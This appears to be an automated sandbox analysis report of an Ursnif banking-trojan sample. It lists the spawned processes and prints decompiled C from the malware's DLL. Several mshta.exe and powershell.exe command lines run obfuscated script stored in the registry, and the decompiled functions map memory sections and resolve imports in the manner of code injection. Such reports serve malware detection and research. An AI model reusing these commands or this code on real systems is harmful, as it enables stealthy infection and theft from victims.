Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: iexplore.exe PID: 5440 Parent PID: 6672

General

Start time:	14:31:04
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17514 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5020 Parent PID: 5872

General

Start time:	14:31:05
Start date:	06/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6388 Parent PID: 6672

General

Start time:	14:31:08
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17520 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 5728 Parent PID: 6672

General

Start time:	14:31:09
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:279558 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6460 Parent PID: 6672

General

Start time:	14:31:12
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83084 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 5068 Parent PID: 5872

General

Start time:	14:31:16
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.cmdline'
Imagebase:	0x7ff7b8470000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: mshta.exe PID: 6520 Parent PID: 3424

General

Start time:	14:31:15
Start date:	06/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>N4ot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(N4ot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Imagebase:	0x7ff687b80000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 5900 Parent PID: 5068

General

Start time:	14:31:17
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD796.tmp' 'c:\Users\user\AppData\Local\Temp\rzslcw3n\CSCA64EAED44D2B4776864E5EDA5D4E8B86.TMP'
Imagebase:	0x7ff69f810000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6644 Parent PID: 6520

General

Start time:	14:31:17
Start date:	06/07/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 4596 Parent PID: 6644

General

Start time:	14:31:18
Start date:	06/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: mshta.exe PID: 3976 Parent PID: 3424

General

Start time:	14:31:19
Start date:	06/07/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nohx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nohx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Imagebase:	0x7ff687b80000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: control.exe PID: 5512 Parent PID: 6560

General

Start time:	14:31:22
Start date:	06/07/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff694a50000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: iexplore.exe PID: 5348 Parent PID: 6672

General

Start time:	14:31:22
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83090 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 6244 Parent PID: 3976

General

Start time:	14:31:22
Start date:	06/07/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5960 Parent PID: 6244

General

Start time:	14:31:23
Start date:	06/07/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 3220 Parent PID: 5872

General

Start time:	14:31:25
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.cmdline'
Imagebase:	0x7ff7b8470000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: iexplore.exe PID: 740 Parent PID: 6672

General

Start time:	14:31:27
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17546 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 6260 Parent PID: 3220

General

Start time:	14:31:28
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES30B.tmp' 'c:\Users\user\AppData\Local\Temp\rpyoew2f\CSCDF3AABDF3FB34DF1A43A4F7FD45C9671.TMP'
Imagebase:	0x7ff69f810000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: csc.exe PID: 4432 Parent PID: 6644

General

Start time:	14:31:29
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.cmdline'
Imagebase:	0x7ff7b8470000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: csc.exe PID: 1740 Parent PID: 6244

General

Start time:	14:31:33
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'
Imagebase:	0x7ff7b8470000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: iexplore.exe PID: 4864 Parent PID: 6672

General

Start time:	14:31:33
Start date:	06/07/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:83102 /prefetch:2
Imagebase:	0x210000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 5940 Parent PID: 4432

General

Start time:	14:31:32
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1395.tmp' 'c:\Users\user\AppData\Local\Temp\xwrbq4ie\CSCC07B09CA405E4901BCF4DD90291B57CA.TMP'
Imagebase:	0x7ff69f810000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cvtres.exe PID: 1808 Parent PID: 1740

General

Start time:	14:31:35
Start date:	06/07/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1D78.tmp' 'c:\Users\user\AppData\Local\Temp\pkkmtuzt\CSC7DF2BB886B1A41BB8B841DD3834E0B8.TMP'
Imagebase:	0x7ff69f810000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6560 Parent PID: 5980 loaddll32.exeCOMMON

Executed Functions

Function 10001456, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10001456(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E10001F0E();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E10001717(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E1000155C(E10001E55,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E10001F87(_t44,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x10004138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E10002009(_t48 + _t14);
				 *0x10004138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E1000201E(_t43);
				goto L11;
			}

0x1000145d
0x10001464
0x10001469
0x10001559
0x10001559
0x10001470
0x10001474
0x1000147a
0x10001488
0x10001489
0x1000148c
0x1000148f
0x10001498
0x1000149b
0x100014a1
0x100014a4
0x100014ab
0x10001556
0x00000000
0x10001556
0x100014b5
0x10001506
0x10001506
0x1000151c
0x10001521
0x10001549
0x10001523
0x10001526
0x1000152c
0x10001531
0x10001538
0x10001538
0x1000153f
0x1000153f
0x1000154c
0x10001552
0x10001554
0x10001554
0x00000000
0x10001552
0x100014c2
0x10001500
0x00000000
0x10001500
0x100014c4
0x100014c7
0x100014d0
0x100014d2
0x100014d6
0x100014f8
0x100014f8
0x00000000
0x100014f8
0x100014d8
0x100014dd
0x100014e2
0x100014e9
0x00000000
0x00000000
0x100014ee
0x100014f1
0x00000000

APIs

Part of subcall function 10001F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001462,73B763F0), ref: 10001F1D
Part of subcall function 10001F0E: GetVersion.KERNEL32 ref: 10001F2C
Part of subcall function 10001F0E: GetCurrentProcessId.KERNEL32 ref: 10001F48
Part of subcall function 10001F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F61

GetSystemTime.KERNEL32(?,00000000,73B763F0), ref: 10001474
SwitchToThread.KERNEL32 ref: 1000147A

Part of subcall function 10001717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
Part of subcall function 10001717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833

Sleep.KERNELBASE(00000000,00000000), ref: 1000149B
GetLongPathNameW.KERNEL32 ref: 100014D0
GetLongPathNameW.KERNEL32 ref: 100014EE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 10001526
GetExitCodeThread.KERNEL32(00000000,?), ref: 10001538
CloseHandle.KERNEL32(00000000), ref: 1000153F
GetLastError.KERNEL32(?,00000000), ref: 10001547
GetLastError.KERNEL32 ref: 10001554

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
Instruction ID: 65dbc16d9a0349db468ca3b41a6515201db422734640c18706fad21f2de96105
Opcode Fuzzy Hash: 86f2e835d60dbcb1ec91d1cce4192dfe94e3a80051a1e2ef8fba96cdcbc9dbfd
Instruction Fuzzy Hash: 6431C275801A25EBF712EBA48C849DF77FCDF883E2B214122F901D7148EB30DA408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10001996(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001A44(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x1000199f
0x100019a6
0x100019a7
0x100019a8
0x100019a9
0x100019aa
0x100019bb
0x100019bf
0x100019d3
0x100019d6
0x100019d9
0x100019e0
0x100019e3
0x100019ea
0x100019ed
0x100019f0
0x100019f3
0x100019f8
0x10001a33
0x100019fa
0x100019fd
0x10001a03
0x10001a08
0x10001a0c
0x10001a2a
0x10001a0e
0x10001a15
0x10001a23
0x10001a23
0x10001a0c
0x10001a3b

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 100019F3

Part of subcall function 10001A44: NtMapViewOfSection.NTDLL(00000000,000000FF,10001A08,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,10001A08,?), ref: 10001A71

memset.NTDLL ref: 10001A15

Strings

@, xrefs: 100019E3

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction ID: d3befc9384620d8d128f167a041658b0fdf48f719705d908fc7b69197333c8db
Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
Instruction Fuzzy Hash: A921FCB6E00209AFDB11DFA9C8849DEFBF9FF48354F104469E615F7210D731AA448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001BAC, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001BAC(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x10004140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x10001bac
0x10001bb5
0x10001bba
0x10001bc0
0x10001bc9
0x10001bcf
0x10001bd1
0x10001bd4
0x10001bd9
0x10001be0
0x10001be0
0x10001be4
0x10001bea
0x10001bef
0x00000000
0x00000000
0x10001bf5
0x10001bff
0x10001c01
0x10001c04
0x10001c07
0x10001c0b
0x10001c13
0x10001c15
0x10001c18
0x10001c80
0x10001c80
0x10001c84
0x00000000
0x00000000
0x10001c1d
0x10001c23
0x10001c25
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3b
0x10001c3f
0x10001c27
0x10001c27
0x10001c2f
0x10001c31
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c31
0x10001c1f
0x10001c1f
0x10001c33
0x10001c33
0x10001c33
0x10001c42
0x10001c45
0x10001c47
0x10001c4e
0x10001c49
0x10001c49
0x10001c49
0x10001c56
0x10001c5c
0x10001c5e
0x10001c8e
0x10001c60
0x10001c60
0x10001c63
0x10001c65
0x10001c6d
0x10001c6d
0x10001c72
0x10001c74
0x10001c7b
0x10001c7d
0x10001c7d
0x10001c7d
0x00000000
0x10001c7d
0x00000000
0x10001c5e
0x10001c0d
0x10001c0d
0x10001c11
0x00000000
0x00000000
0x10001c11
0x10001c91
0x10001c91
0x10001c98
0x10001c9d
0x00000000
0x00000000
0x10001ca3
0x10001cae
0x00000000
0x10001cae
0x10001ca5
0x10001ca5
0x10001cab
0x00000000
0x10001cab
0x10001bd9
0x10001caf
0x10001cb4

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 10001BE4
GetProcAddress.KERNEL32(?,00000000), ref: 10001C56

Memory Dump Source

Source File: 00000000.00000002.940299869.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.940284831.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940319949.0000000010003000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.940333046.0000000010005000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.940346053.0000000010006000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 62c796670e4a60b765b11e521790c9b6dde4df6d90a37f565c64d30f3b720e0e
Instruction ID: 50b75003dc9d1c4c95d46c285da4c6f2fbc0cd39a6ad98ee869f03b58150b9be
Opcode Fuzzy Hash: 62c796670e4a60b765b11e521790c9b6dde4df6d90a37f565c64d30f3b720e0e
Instruction Fuzzy Hash: 09313571E4020A9FFB54CF59C890AEEB7F9FF04394B654069E841EB248E770DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10001A44, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001A44(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
